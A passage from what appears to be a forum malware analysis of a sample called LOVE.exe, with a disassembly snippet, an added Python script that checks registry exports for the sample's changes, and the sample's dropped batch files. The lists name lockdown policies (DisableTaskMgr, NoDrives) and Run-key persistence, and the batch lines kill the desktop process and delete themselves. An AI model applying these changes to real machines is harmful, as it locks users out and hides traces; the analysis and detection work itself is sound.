F5 |. BB E03B4000 mov ebx,LOVE.00403BE0
FA |. E8 54000000 call LOVE.00403353 ; by this point it is basically done; this pops up a message box reading "李研我爱你!" ("Li Yan, I love you!")
FF |. 83C4 28 add esp,0x28
|. 8BE5 mov esp,ebp
|. 5D pop ebp
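As an added example (not from the original post), the script below checks an offline registry export for the values the listing above shows the sample writing, and decodes the pair of dwords the listing pushes for NoDrives. It assumes HKCU for the policy and Run keys and HKLM for the SHOWALL key, reads the 0x80000601-tagged pair as an IEEE-754 double, and uses a constructed .reg sample rather than data from a real host.

```python
# Added example (not code from the original post): triage a registry export
# offline against the changes the analysis above attributes to LOVE.exe.
import re
import struct

# Values the listing shows the sample writing, grouped by key. Hive placement
# (HKCU for the policies and the Run key, HKLM for SHOWALL) is an assumption.
HKCU = r"HKEY_CURRENT_USER\Software"
INDICATORS = {
    HKCU + r"\Microsoft\Windows\CurrentVersion\Policies\Explorer": {
        "NoControlPanel", "NoRun", "NoDrives", "NoViewOnDrive", "NoFolderOptions",
        "NoClose", "NoFind", "NoFileMenu", "NoRealMode", "NoLogOff", "NoRecentDocsMenu"},
    HKCU + r"\Microsoft\Windows\CurrentVersion\Policies\System": {
        "DisableTaskMgr", "DisableRegistryTools"},
    HKCU + r"\Policies\Microsoft\Internet Explorer\Restrictions": {
        "NoFavorites", "NoPrinting", "NoBrowserOptions", "NoViewSource", "NoBrowserContextMenu"},
    HKCU + r"\Policies\Microsoft\Internet Explorer\Control Panel": {"HomePage"},
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
    r"\Folder\Hidden\SHOWALL": {"CheckedValue"},
}
RUN_KEY = HKCU + r"\Microsoft\Windows\CurrentVersion\Run"
KEY_RE = re.compile(r"\[(.+)\]")
VALUE_RE = re.compile(r'(?:"([^"]+)"|(@))=(?:dword:([0-9a-fA-F]{8})|"(.*)")')

def parse_reg(text):
    """Parse the .reg subset used here (dword and string values) into {key: {name: value}}."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if m := KEY_RE.fullmatch(line):
            current = keys.setdefault(m.group(1), {})
        elif current is not None and (m := VALUE_RE.fullmatch(line)):
            name, at, dword, string = m.groups()
            # .reg files escape backslashes inside string data as "\\".
            current[name or at] = int(dword, 16) if dword else string.replace("\\\\", "\\")
    return keys

def epl_double_to_dword(hi, lo):
    """NoDrives is pushed as two dwords behind a 0x80000601 tag; read as one little-endian
    IEEE-754 double (an assumption about the runtime) they give the integer bitmask actually
    written: 0x41EFFFFF, 0xFFE00000 -> 0xFFFFFFFF, i.e. every drive letter hidden."""
    return int(struct.unpack("<d", struct.pack("<II", lo, hi))[0])

def triage(reg_text):
    """Return (key, value name, observed value) for every indicator present in the export."""
    keys, findings = parse_reg(reg_text), []
    for key, names in INDICATORS.items():
        for name, value in sorted(keys.get(key, {}).items()):
            # Policy values are harmful when non-zero; SHOWALL\CheckedValue when zeroed.
            bad = value == 0 if name == "CheckedValue" else value != 0
            if name in names and bad:
                findings.append((key, name, value))
    for name, command in keys.get(RUN_KEY, {}).items():  # Run-key persistence
        if "love.exe" in str(command).lower():
            findings.append((RUN_KEY, name, command))
    return findings

# Constructed sample export, not from a real host; paths mirror the listing above.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"LOVE.exe"="C:\\Documents and Settings\\Administrator\\Desktop\\LOVE.exe"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoRun"=dword:00000001
"NoDrives"=dword:ffffffff
"NoLogOff"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"=dword:00000000
"""
```

Running `triage(SAMPLE_REG)` on the constructed export reports the Run entry, NoRun, NoDrives and the zeroed CheckedValue, and leaves the harmless NoLogOff=0 alone; on a real host, feed it the output of `reg export` for the keys above.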
Addendum:
Contents of the generated del.bat and ddel.bat files:
del.bat:
del Aver.exe del.bat ----> deletes Aver.exe and del.bat
del %
ddel.bat:
@echo off
taskkill /f /im expleror.exe ----> forcibly terminates the expleror.exe process, i.e. the desktop process.
start expleror.exe ----> restarts it. This is what makes the change of all application icons visible: after it runs, every application's default icon is that Aver.ico.
del ddel.bat ----> deletes itself.
exit
This is my first analysis; there are many places and many details that I have not analysed properly, so please give me your guidance, experts...